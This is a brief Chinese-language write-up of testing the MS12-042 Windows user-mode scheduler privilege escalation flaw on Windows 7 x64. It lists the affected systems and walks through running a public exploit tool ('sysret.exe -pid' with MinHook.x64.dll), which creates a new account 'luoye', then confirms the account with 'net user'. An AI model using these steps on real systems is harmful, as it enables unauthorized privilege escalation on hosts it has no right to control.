MS12-042 用户态调度机制特权提升漏洞

漏洞编号:MS12-042

披露日期: 2012/6/12

受影响的操作系统:Windows 2000;XP;Server 2003;windows 7;Server 2008;

测试系统：windows 7 x64

 

利用网上现有的提权工具 测试

运行test.exe 

列出进程id

y也可以直接调出任务管理器去找

pid=3996

在执行 sysret.exe -pid 3996   要保证MinHook.x64.dll 在当前目录

此时多了一个用户luoye

 

 net user  luoye 

 

 提权成功